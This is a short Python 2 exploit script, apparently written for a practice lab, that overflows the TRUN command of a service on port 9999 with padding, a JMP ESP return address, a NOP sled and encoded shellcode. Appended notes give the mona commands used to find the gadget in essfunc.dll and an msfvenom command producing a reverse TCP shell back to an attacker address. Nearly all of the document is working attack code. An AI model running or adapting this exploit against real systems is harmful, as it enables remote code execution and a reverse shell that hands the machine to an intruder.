  1 #!/usr/bin/python2.7
  2 
  3 import socket
  4 
  5 '''
  6 625012a0
  7 625012ad
  8 '''
  9 
 10 buf = "TRUN /.:/"         #Exploit
 11 buf += "A" * 2003         #Buffer Overflow
 12 buf += "\xa0\x12\x50\x62" #JMP ESP
 13 buf += "\x90" * 15
 14 buf += b"\xdb\xc0\xb8\xf5\xfb\x47\xfb\xd9\x74\x24\xf4\x5a"
 15 buf += b"\x2b\xc9\xb1\x59\x83\xc2\x04\x31\x42\x15\x03\x42"
 16 buf += b"\x15\x17\x0e\xbb\x13\x58\xf1\x44\xe4\x06\x7b\xa1"
 17 buf += b"\xd5\x14\x1f\xa1\x44\xa8\x6b\xe7\x64\x43\x39\x1c"
 18 buf += b"\x44\xac\xb1\xab\xec\x74\x45\xa1\xd8\x49\x99\xea"
 19 buf += b"\x25\xc8\x65\xf1\x79\x2a\x57\x3a\x8c\x2b\x90\x8c"
 20 buf += b"\xfa\xc4\x4c\x84\x57\x0a\xfa\xd8\x6b\x2b\x2c\x8b"
 21 buf += b"\x18\x6b\xb4\xb1\xdf\x1f\x08\xbb\x0f\x54\xd8\xa3"
 22 buf += b"\x24\x32\xf9\xd2\xe9\x92\x7c\x1d\x79\x2e\x4e\x61"
 23 buf += b"\xcb\xc5\x84\x16\xcd\x0f\xd5\xe8\x62\x6e\xd9\xe4"
 24 buf += b"\x7b\xb7\xde\x16\x0e\xc3\x1c\xaa\x09\x10\x5e\x70"
 25 buf += b"\x9f\x86\xf8\xf3\x07\x62\xf8\xd0\xde\xe1\xf6\x9d"
 26 buf += b"\x95\xad\x1a\x23\x79\xc6\x27\xa8\x7c\x08\xae\xea"
 27 buf += b"\x5a\x8c\xea\xa9\xc3\x95\x56\x1f\xfb\xc5\x3f\xc0"
 28 buf += b"\x59\x8e\xd2\x17\xdd\x6f\x2d\x18\x83\xe7\xe1\xd5"
 29 buf += b"\x3c\xf7\x6d\x6d\x4e\xc5\x32\xc5\xd8\x65\xba\xc3"
 30 buf += b"\x1f\xfc\xac\xf3\xf0\x46\xbc\x0d\xf1\xb6\x94\xc9"
 31 buf += b"\xa5\xe6\x8e\xf8\xc5\x6d\x4f\x04\x10\x1b\x45\x92"
 32 buf += b"\x91\xe9\x46\x9e\xce\x0f\x79\x44\x05\x86\x9f\x28"
 33 buf += b"\x49\xc8\x0f\x89\x39\xa8\xff\x61\x50\x27\xdf\x92"
 34 buf += b"\x5b\xe2\x48\x38\xb4\x5a\x20\xd5\x2d\xc7\xba\x44"
 35 buf += b"\xb1\xd2\xc6\x47\x39\xd6\x37\x09\xca\x93\x2b\x7e"
 36 buf += b"\xad\x5b\xb4\x7f\x58\x5b\xde\x7b\xca\x0c\x76\x86"
 37 buf += b"\x2b\x7a\xd9\x79\x1e\xf9\x1e\x85\xdf\xcb\x55\xb0"
 38 buf += b"\x75\x73\x02\xbd\x99\x73\xd2\xeb\xf3\x73\xba\x4b"
 39 buf += b"\xa0\x20\xdf\x93\x7d\x55\x4c\x06\x7e\x0f\x20\x81"
 40 buf += b"\x16\xad\x1f\xe5\xb8\x4e\x4a\x75\xbe\xb0\x08\x52"
 41 buf += b"\x67\xd8\xf2\xe2\x97\x18\x99\xe2\xc7\x70\x56\xcc"
 42 buf += b"\xe8\xb0\x97\xc7\xa0\xd8\x12\x86\x03\x79\x22\x83"
 43 buf += b"\xc2\x27\x23\x20\xdf\xd8\x5e\x49\xe0\x19\x9f\x43"
 44 buf += b"\x85\x1a\x9f\x6b\xbb\x27\x49\x52\xc9\x66\x49\xe1"
 45 buf += b"\xc2\xdd\xec\x40\x49\x1d\xa2\x93\x58"
 46 
 47 s = socket.socket (socket.AF_INET, socket.SOCK_STREAM) #Creates ipv4 Socket 
 48 s.connect(("10.50.42.7", 9999))   #IP and port to connect to
 49 print s.recv(1024)                #print response
 50 s.send(buf)                       #send the variable buf
 51 print s.recv(1024)                #print response
 52 s.close()


!mona modules gave me .dll 
!mona jmp -r esp -m "essfunc.dll"


Payload: msfvenom -p windows/reverse_tcp LHOST=10.50.31.252 LPORT=6666 -b"x\00" -f python
